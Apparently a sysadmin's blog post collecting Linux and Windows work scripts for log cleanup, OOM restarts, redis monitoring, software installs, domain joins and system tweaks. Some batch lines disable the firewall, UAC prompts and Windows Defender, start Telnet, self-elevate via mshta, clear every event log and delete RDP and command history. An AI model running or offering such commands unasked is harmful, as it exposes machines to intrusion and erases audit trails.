This post records the scripts I have written at work.

I. Linux scripts

Correct the time zone

#!/bin/bash
# Install the ntp service
yum install -y ntp
# Update the time
ntpdate -u cn.pool.ntp.org
# Add the time update to the scheduled tasks
echo "0 2 * * * ntpdate -u cn.pool.ntp.org" >> /var/spool/cron/root
# Change the time zone
mv /etc/localtime /etc/localtime_bak
/bin/cp -f /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
ntpdate -u cn.pool.ntp.org
date -R

Clean up large log files

#!/bin/bash
#30 2 * * * cd /data/shell; ./clear_logs.sh >/dev/null 2>&1
MTIME_ZIP=7
MTIME_DEL=60
#DIRS="/data/product/logs aaa"
DIRS="/data/product/logs /data/server/*/log /data/jiayoubao/*/log"
for DIR in $DIRS;
do
        if [ ${#DIR} -le 4 ]
        then
                echo "Error, DIR:$DIR, please check directory len, quitting...."
                exit 1
        fi

        if [[ "$DIR" =~ "etc" ]] || [[ "$DIR" =~ "conf" ]]
        then
                echo "Error, DIR:$DIR, directory cannot include etc or conf, quitting...."
                exit 1
        fi
        cd "$DIR"
        if [ $? -ne 0 ]
        then
                echo "Error, cannot cd to logs directory, continue...."
                continue
        fi
        find "$DIR" -type f -mtime +$MTIME_ZIP -name "*.log" -exec gzip {} \;
        find "$DIR" -type f -mtime +$MTIME_DEL -name "*.log.gz" -exec rm -f {} \;
        echo "INFO, $DIR delete complete!"
done
exit 0

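Monitor a module for OOM and restart it automatically

The supply_chain module hangs while its process is still alive, so Zabbix process monitoring cannot tell whether the service is online. Because the log prints java.lang.OutOfMemoryError: GC overhead limit exceeded when the module hangs, the script reads the log on a schedule to detect the OOM, removes the instance from the Eureka registry, and restarts the service.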

#!/bin/bash
# bash is required: the {0..10} brace expansion below is not available in plain sh
time1=$(date "+%Y%m%d")
time2=$(date "+%Y%m%d-%H:%M:%S")
found=0
# Get the process pid
p_pid=`ps -ef|grep java|grep jar|grep -v grep|grep -v tools|grep -v tar.gz|grep supply_chain | awk '{print $2}'`
# Loop over the logs (the log is split into several files)
for i in {0..10}
do
    grep 'java.lang.OutOfMemoryError: GC overhead limit exceeded' /data/server/supply_chain/log/all-$time1-$i.log > /dev/null
    if test $? -eq 0 ; then
        found=1
        echo $time2 all-$time1-$i.log  found! >> /usr/local/src/supply_chain_oom.txt
        # Rewrite the matched text so the next run does not alert on the same line again
        sed -i "s/java.lang.OutOfMemoryError: GC overhead limit exceeded/java.lang.OOM: GC overhead limit exceede/g" /data/server/supply_chain/log/all-$time1-$i.log
        # Take the instance out of eureka
        curl --request PUT "http://47.103.xx.xx:8761/eureka/apps/SUPPLY-CHAIN/172.19.91.119:7068/status?value=DOWN"
        # Dump the heap for analysis
        jmap -F -dump:format=b,file=/usr/local/src/$time2-ip_heap.bin $p_pid
        if test -z "$p_pid" ;then
            echo -e "project is not running,please check...."
        else
            # Restart the service
            cd /data/server/supply_chain/tools; ./restart.sh > /dev/null 2>&1
            # Register with eureka again
            curl --request PUT "http://47.103.38.249:8761/eureka/apps/SUPPLY-CHAIN/172.19.91.119:7068/status?value=UP"
        fi
    fi
done

# Only record "no OOM found" when no log segment matched
if test $found -eq 0 ; then
    echo $time2 扫描完成,未发现OOM >> /usr/local/src/supply_chain_oom.txt
fi
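
The script above rewrites the application log with sed so that the same OOM line is not matched twice. As an added example (not the author's script), the same effect can be had without modifying the log by remembering how many bytes were already scanned; the function name count_new_matches, the state file and the sample log lines are assumptions constructed for this illustration.

```bash
#!/bin/bash
# Added example: scan only what was appended to a log since the previous run,
# so the log itself stays untouched and still reflects what the JVM wrote.
# count_new_matches, the state file and the sample lines are hypothetical.

PATTERN='java.lang.OutOfMemoryError: GC overhead limit exceeded'

# usage: count_new_matches LOGFILE STATEFILE
# Prints how many new lines contain $PATTERN, then stores the scanned offset.
count_new_matches() {
    local log=$1 state=$2 size offset=0 hits
    # A log segment that does not exist yet simply has no matches.
    [ -r "$log" ] || { echo 0; return 0; }
    size=$(($(wc -c < "$log")))
    if [ -r "$state" ]; then
        read -r offset < "$state" || true
    fi
    # A missing or corrupt state value means "scan from the start".
    case $offset in ''|*[!0-9]*) offset=0 ;; esac
    # A log smaller than the stored offset was rotated or truncated: rescan.
    if [ "$offset" -gt "$size" ]; then offset=0; fi
    # tail -c +N starts at byte N (1-based), i.e. right after the old offset.
    hits=$(tail -c "+$((offset + 1))" "$log" | grep -cF -- "$PATTERN" || true)
    printf '%s\n' "$size" > "$state"
    echo "$hits"
}

# Walk-through on constructed log lines: first scan, repeat scan, new OOM line.
demo() {
    local dir log state first second third
    dir=$(mktemp -d)
    log=$dir/all-20240101-0.log
    state=$dir/offset
    printf '%s\n' '10:00:01 INFO started' \
        "10:05:09 ERROR $PATTERN" > "$log"
    first=$(count_new_matches "$log" "$state")
    second=$(count_new_matches "$log" "$state")
    printf '%s\n' "10:09:30 ERROR $PATTERN" >> "$log"
    third=$(count_new_matches "$log" "$state")
    rm -rf "$dir"
    echo "$first $second $third"
}

demo
```

A non-zero count is the point at which the monitor would take the instance out of eureka and restart it; one state file is needed per log segment.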

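Monitor services dropping out of redis

Services register themselves in redis. The script periodically exports the redis keys and compares them with the previous export; if any key is missing, it writes a log entry that triggers an alert.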

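#!/bin/bash
date=`date +%Y-%m-%d`
date1=`date +%Y-%m-%d%t%H:%M:%S`
# A list.log file must be created before the script runs for the first time
# Export the keys currently in redis
redis-cli --raw  -p 6381 --scan --pattern "*" > now.log
# Merge the two files
cat list.log  now.log  | sort |uniq > new.log
# Compare the fresh export with the merged list (previous + fresh);
# a key that appears only once is in the list but no longer in redis
sort now.log new.log | uniq -c | awk '$1 == 1 {sub(/^ *[0-9]+ /, ""); print}' > log/tmp.log
if test -s log/tmp.log ; then
    echo "检测到缺失"
    # Read line by line so keys containing spaces are logged intact
    while IFS= read -r LINE
    do
        echo $date1 "$LINE" >> log/$date.log
    done < log/tmp.log
else
    echo "NULL";
#    echo $date1 "未检测到缺失" >> log/$date.log
fi
# Rename the merged list to list.log for the next comparison
mv new.log list.log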
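
The comparison described above, written with comm as an added example (not the author's script): each line is treated as one key, so keys containing spaces are reported whole, and the baseline stays cumulative as in the original. The function names and the sample key names are constructed for this illustration.

```bash
#!/bin/bash
# Added example: report keys that are in the baseline but absent from the
# current snapshot. All function names and key names here are hypothetical.

# usage: missing_keys BASELINE CURRENT   -> prints one missing key per line
missing_keys() {
    local base_sorted now_sorted
    [ -f "$1" ] || : > "$1"            # first run: start from an empty baseline
    base_sorted=$(mktemp)
    now_sorted=$(mktemp)
    # comm needs both inputs sorted with the same collation; -u drops the
    # duplicates that an incremental key scan may return.
    LC_ALL=C sort -u "$1" > "$base_sorted"
    LC_ALL=C sort -u "$2" > "$now_sorted"
    LC_ALL=C comm -23 "$base_sorted" "$now_sorted"   # lines only in the baseline
    rm -f "$base_sorted" "$now_sorted"
}

# usage: report_missing BASELINE CURRENT ALERTLOG -> prints the number logged
report_missing() {
    local ts tmp key count=0
    ts=$(date '+%Y-%m-%d %H:%M:%S')
    tmp=$(mktemp)
    missing_keys "$1" "$2" > "$tmp"
    while IFS= read -r key; do
        printf '%s %s\n' "$ts" "$key" >> "$3"
        count=$((count + 1))
    done < "$tmp"
    rm -f "$tmp"
    echo "$count"
}

# usage: update_baseline BASELINE CURRENT
# The baseline becomes the union of both files, so a key that has dropped out
# keeps being reported on every run until it registers again.
update_baseline() {
    local tmp
    tmp=$(mktemp)
    LC_ALL=C sort -u "$1" "$2" > "$tmp" && mv "$tmp" "$1"
}

# Walk-through on constructed keys; prints the keys written to the alert log.
demo() {
    local dir
    dir=$(mktemp -d)
    printf '%s\n' 'svc:order:10.0.0.5' 'svc:pay:10.0.0.6' \
        'svc:user profile:10.0.0.7' > "$dir/list.log"
    printf '%s\n' 'svc:stock:10.0.0.8' 'svc:order:10.0.0.5' > "$dir/now.log"
    report_missing "$dir/list.log" "$dir/now.log" "$dir/alert.log" > /dev/null
    update_baseline "$dir/list.log" "$dir/now.log"
    # Drop the two timestamp fields so the output is stable
    cut -d' ' -f3- "$dir/alert.log"
    rm -rf "$dir"
}

demo
```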

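II. Windows scripts

For display purposes, the bat comment marker :: has been changed to ### in the Windows scripts. Replace ### with :: before actual use.

Automatically install common software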

@echo off
### Run cmd as administrator
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
mode con lines=20 cols=70

echo ※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
echo ※                                                                ※
echo ※                     正在安装常用软件...                        ※
echo ※································※
echo ※                     请勿关闭该窗口                             ※
echo ※                     请按提示进行操作                           ※
echo ※                                                                ※
echo ※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※

title 新员工入职常用软件安装
color 0e

### Check whether the directory already exists; if it does, the software was installed before, so quit
### (no parenthesized block here, so that %errorlevel% below is evaluated after each installer runs)
if exist "c:\softinstall" goto :eof
md "c:\softinstall"
echo                                                                  .

### Copy the document to the target directory
echo                                                                  .
copy /y \\172.16.1.161\常用软件\software\中智诚集团新员工入职指引.pdf c:\softinstall
echo                                                                  .

### Show the Computer icon on the desktop
ECHO ※显示计算机图标...
ECHO 请稍等...
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 0 /f >nul 2>nul
echo 显示计算机图标 -- OK
echo                                                                  .

start /wait \\172.16.1.161\常用软件\software\install_office2010.bat

### DingTalk
ECHO 正在安装钉钉...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\DingTalk_v4.3.7.32.exe /S /v/qn
if %errorlevel%==0 (echo  钉钉 -- OK) else (echo  钉钉 -- error)
echo                                                                  .

### Chrome browser
ECHO 正在安装Chrome浏览器...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\Installer\setup.exe /S /v/qn
if %errorlevel%==0 (echo  Chrome浏览器 -- OK) else (echo  Chrome浏览器 -- error)
echo                                                                  .

### WeChat
ECHO 正在安装微信...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\WeChatSetup.exe /S /v/qn
if %errorlevel%==0 (echo 微信 -- OK) else (echo 微信-- error)
echo                                                                  .

### WinRAR
ECHO 正在安装WinRAR...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\winrar-x64-550sc.exe /S /v/qn
if %errorlevel%==0 (echo  WinRAR-- OK) else (echo WinRAR-- error)
echo                                                                  .

### Sogou input method
ECHO 正在安装搜狗输入法...
ECHO 请稍等...
start /wait \\172.16.1.161\常用软件\software\sogou_pinyin_90d.exe /S /v/qn
if %errorlevel%==0 (echo  搜狗输入法 -- OK) else (echo  搜狗输入法 -- error)
echo                                                                  .

### Write a record to the server
echo %date%,%time%,%COMPUTERNAME%,软件安装完成 >> \\172.16.1.100\pclog\%username%.txt

### Foxmail
ECHO 正在安装Foxmail软件...
ECHO 请稍等...
\\172.16.1.161\常用软件\software\FoxmailSetup.exe
if %errorlevel%==0 (echo  Foxmail软件 -- OK) else (echo  Foxmail软件 -- error)
echo                                                                  .

### Open the welcome document
start "" "c:\softinstall\中智诚集团新员工入职指引.pdf"

Enable Remote Desktop

Note: for data security, do not enable Remote Desktop lightly!!!

title 一键开启远程桌面 

@echo off
### Run cmd as administrator
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
echo 用批处理关闭防火墙,包括家庭和工作网络位置、公用网络位置设置。
netsh firewall set opmode mode=disable profile=ALL
netsh firewall set opmode mode=disable
echo 防火墙已关闭!
echo .
echo .
echo 正在配置其他选项...
echo 请等待...
echo .
### Set the standby timeout to never
powercfg -change -standby-timeout-ac 0

@ping 127.0.0.1 -n 10 >nul

### Ticking "Allow users to connect remotely to this computer"...
reg add  "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f >nul 2>nul
### Setting your logon password to "0"
###net user %username% 0 >nul 2>nul
### Enabling port "3389"...
reg add  "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f >nul 2>nul
reg add  "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f >nul 2>nul
### Configuring and restarting the "Printer Spooler" service...
sc config   Spooler start= AUTO >nul 2>nul
net stop  Spooler  >nul 2>nul
net start Spooler >nul 2>nul
### Configuring the "Telnet" service...
sc config   TlntSvr start= AUTO >nul 2>nul 
net start TlntSvr >nul 2>nul
### Configuring the "Terminal Service" service...
sc config   TermService start= AUTO >nul 2>nul
net start TermService >nul 2>nul
### Configuring the "Remote Desktop Help Session Manager" service...
sc config   RDSessMgr start= AUTO >nul 2>nul
net start RDSessmgr >nul 2>nul
### Ticking "Use the Welcome screen"...
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LogonType" /t REG_DWORD /d 1 /f >nul 2>nul
### Ticking "Use Fast User Switching"...
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 1 /f >nul 2>nul
echo         ※※※※※※※※※※※※※※
echo         ※                        ※
echo         ※   远程桌面设置完成     ※
echo         ※                        ※
echo         ※※※※※※※※※※※※※※
echo .
echo .
pause

Leave the domain

@echo off
### Run cmd as administrator
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
mode con lines=20 cols=70

wmic computersystem where Name="%COMPUTERNAME%" call UnJoinDomainOrWorkgroup username="zzc.com\ad" password="xxx"
echo 退域完成,重启电脑生效
pause

Join the domain

### Connect to the network share
net use \\172.16.1.184\ipc$ xxx /user:backup

### Get the current user's desktop path
for /f "tokens=2,*" %%i in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Desktop"') do Set a=%%j

### Change the Administrator password
net user Administrator xxxx

### Join the domain
xcopy \\172.16.1.184\backup\加域助手\*.*  d:\ad\ /e /c /s /q
start d:\ad\加域助手v0.1.exe

### Do not show hidden files
reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v Hidden /t REG_DWORD /d 2 /f
taskkill /im explorer.exe /f
start %systemroot%\explorer.exe

### Delete the domain-join files
del d:\ad /s /f /a /q
rd d:\ad /s /q

System optimization

### Optimize the system
### ------------------------------------------Optimization start--------------------------------------------------

echo 优化开始

echo 关闭系统索引服务
sc stop WMPNetworkSvc
ping -n 3 127.0.0.1>nul
sc stop wsearch
sc config WMPNetworkSvc start= disabled
sc config wsearch start= disabled
echo 完成

ECHO 关闭用户账户控制(UAC)
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /d 0 /t REG_DWORD /f

echo 完成
ECHO 关闭显示器前等待时间: 从不
powercfg -change -monitor-timeout-ac 0
powercfg -change -monitor-timeout-dc 0
echo 完成

ECHO 关闭休眠
powercfg -h off
echo 完成  

ECHO 禁止window发送错误报告
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /d 1 /t REG_DWORD /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /d 0 /t REG_DWORD /f
echo 完成

ECHO 禁用"最近使用的项目"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /d 0 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackDocs" /d 0 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify" /v "IconStreams" /t REG_BINARY /f
reg add "HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify" /v "PastIconsStream" /t REG_BINARY /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRecentDocsHistory" /d 1 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInstrumentation" /d 1 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v "DisableSearchBoxSuggestions" /d 1 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v "DisableSearchHistory" /d 1 /t REG_DWORD /f
echo 完成

ECHO 关闭Windows Defender
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f
echo 完成

ECHO 关闭家庭组
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\HomeGroup" /v "DisableHomeGroup" /d 1 /t REG_DWORD /f
echo 完成

ECHO 调整休眠文件到最小
powercfg /h size 50
echo 完成

ECHO 关闭程序兼容性助手
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisablePCA" /d 1 /t REG_DWORD /f
sc stop PcaSvc
sc config PcaSvc start= disabled
echo 完成

ECHO 延迟启动 Superfetch 服务
sc config "SysMain" start= delayed-auto
echo 完成

::ECHO 禁止 Superfetch 服务(SSD必选)
::sc stop SysMain
::sc config "SysMain" start= disabled
::reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /d 0 /t REG_DWORD /f
::echo 完成

ECHO 关闭开机画面(GUI引导可以提高一点开机速度)
bcdedit /set quietboot on
echo 完成

ECHO 关闭客户体验改善计划
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows" /v "CEIPEnable" /d 0 /t REG_DWORD /f
echo 完成

ECHO 隐藏操作中心任务栏托盘
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /d 1 /t REG_DWORD /f
echo 完成

ECHO 关闭自动播放
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /d 255 /t REG_DWORD /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /d 255 /t REG_DWORD /f
echo 完成

ECHO 关闭磁盘碎片整理计划
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"
echo 完成

ECHO 禁用系统日志和内存转储(禁止自动重启)
::reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl" /v "LogEvent" /d 0 /t REG_dword /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /d 0 /t REG_dword /f
::reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CrashControl" /v "CrashDumpEnabled" /d 0 /t REG_dword /f
::reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Windows Error Reporting" /v "LoggingDisabled" /d 1 /t REG_dword /f
::reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /d 1 /t REG_dword /f
echo 完成

ECHO 禁用疑难解答和系统诊断以及NTFS快捷方式跟踪服务
sc stop WdiSystemHost
sc stop WdiServiceHost
sc stop DPS
sc stop DiagTrack
sc config DPS start= disabled
sc config WdiServiceHost start= disabled
sc config WdiSystemHost start= disabled
sc config DiagTrack start= disabled
echo 完成

ECHO 禁用NTFS快捷方式跟踪和IPV6服务
sc stop iphlpsvc
sc stop TrkWks
sc config TrkWks start= disabled
sc config iphlpsvc start= disabled
echo 完成 

ECHO 禁用任务计划程序自启项
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\Windows Error Reporting\QueueReporting"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\SkyDrive\Routine Maintenance Task"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\SkyDrive\Idle Sync Maintenance Task"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\Diagnosis\Scheduled"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"
SCHTASKS /Change /DISABLE /TN "\GoogleUpdateTaskMachineUA"
SCHTASKS /Change /DISABLE /TN "\GoogleUpdateTaskMachineCore"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Office\OfficeTelemetryAgentFallBack"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Office\OfficeTelemetryAgentLogOn"
SCHTASKS /Change /DISABLE /TN "\AdobeAAMUpdater-1.0-%computername%-%username%"
SCHTASKS /Change /DISABLE /TN "\Microsoft\Office\Office 15 Subscription Heartbeat"
echo 完成

ECHO 关机时强制杀后台不等待
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /d 0 /t REG_SZ /f
echo 完成

ECHO 移除右键菜单中的SkyDrive Pro
reg delete "HKEY_CLASSES_ROOT\AllFilesystemObjects\shell\SPFS.ContextMenu" /f
echo 完成

ECHO 禁止一联网就打开浏览器
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\NetworkConnectivityStatusIndicator" /v "NoActiveProbe" /d 1 /t REG_DWORD /f
echo 完成

::ECHO 删除“这台电脑”6个文件夹

::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{374DE290-123F-4565-9164-39C4925E467B}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A0953C92-50DC-43bf-BE83-3742FED03C9C}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{374DE290-123F-4565-9164-39C4925E467B}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A0953C92-50DC-43bf-BE83-3742FED03C9C}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}" /f
::reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}" /f
::echo 完成

ECHO 删除回收站右键固定到开始屏幕
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\PintoStartScreen" /f
echo 完成

ECHO 去除快捷方式小箭头和后缀(我没去箭头,需要的把第一行的::去掉即可)
::reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /d "%systemroot%\system32\imageres.dll,197" /t reg_sz /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer" /v link /d "00000000" /t REG_BINARY /f
del "%userprofile%\AppData\Local\iconcache.db" /f /q
echo 完成

::ECHO 去除UAC小盾牌
::reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 77 /d "%systemroot%\system32\imageres.dll,197" /t reg_sz /f
::del "%userprofile%\AppData\Local\iconcache.db" /f /q
::echo 完成

ECHO 关闭不必要的视觉动画效果
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\DWM" /v "DisallowAnimations" /d 1 /t REG_dword /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "TurnOffSPIAnimations" /d 1 /t REG_dword /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /d 0 /t REG_SZ /f
echo 完成

::ECHO 设置系统自带截屏保存到桌面
::rd /s /q %userprofile%\pictures\Screenshots
::mklink /j %userprofile%\pictures\Screenshots %userprofile%\desktop
::echo 完成 

ECHO IE11开启企业模式
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\EnterpriseMode" /v SiteList /d "HKCU\Software\policies\Microsoft\Internet Explorer\Main\EnterpriseMode" /t reg_sz /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\EnterpriseMode" /v Enable /d "" /t reg_sz /f
echo 完成 

echo 打开IE请勿追踪功能(Do Not Track)
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "DoNotTrack" /d "1" /t REG_DWORD /f
ECHO 完成

ECHO 鼠标指向右上角不显示超级按钮
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\EdgeUI" /v DisableCharms /d 1 /t REG_DWORD /f
echo 完成

echo 当资源管理器崩溃时则自动重启资源管理器
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /d "1" /t REG_DWORD /f
ECHO 完成

echo 开启资源管理器自动刷新功能
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Update" /v "UpdateMode" /d "1" /t REG_DWORD /f
ECHO 完成

echo 为桌面和资源管理器创建不同的进程
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "DesktopProcess" /d "1" /t REG_DWORD /f
ECHO 完成

### ------------------------------------------Optimization end--------------------------------------------------

Back up database files

@echo off
### Date format
set "myDate=%date:~,4%%date:~5,2%%date:~8,2%"
set "myPath=\\10.23.62.139\data\logbackup\kingdee\%myDate%"

### Create the directory
md "%myPath%"

### Copy to the network share
xcopy D:\账套备份\*.* "%myPath%" /D /E /Y /H /K 

### Keep another copy on the local machine
md D:\账套备份1\%myDate%\
xcopy D:\账套备份\*.* D:\账套备份1\%myDate%\
exit

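Clear computer usage records

Delete credentials

@echo off
### Delete the connections saved by Windows
net use * /delete /y
### This seems to clear the authentication saved by Windows, or something like that
klist purge
### Delete an entry from the Windows Credential Manager; the value after delete: is the address of your share
cmdkey /delete:172.16.1.70

### Create a credential
cmdkey /add:172.16.1.180 /user:zzc\ad /pass:password
### Delete the RAS credentials saved for remote access
cmdkey /delete /ras

### Restart the service
net stop Workstation /y
net start Workstation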

Delete drive mappings

Delete recent access records

Del /F /Q %APPDATA%\Microsoft\Windows\Recent\*
Del /F /Q %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\*
Del /F /Q %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\*
REG Delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /VA /F
REG Delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths /VA /F

Delete Remote Desktop records

### win10
del /F /S /Q /AH  "%USERPROFILE%\Documents\default.rdp"
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f
### win7
del /F /S /Q /AH  "%USERPROFILE%\My Documents\default.rdp"
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f

Delete system logs

for /f %x in ('wevtutil el') do wevtutil cl "%x"

Delete CMD window history

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\ /f

Stop CMD from recording history

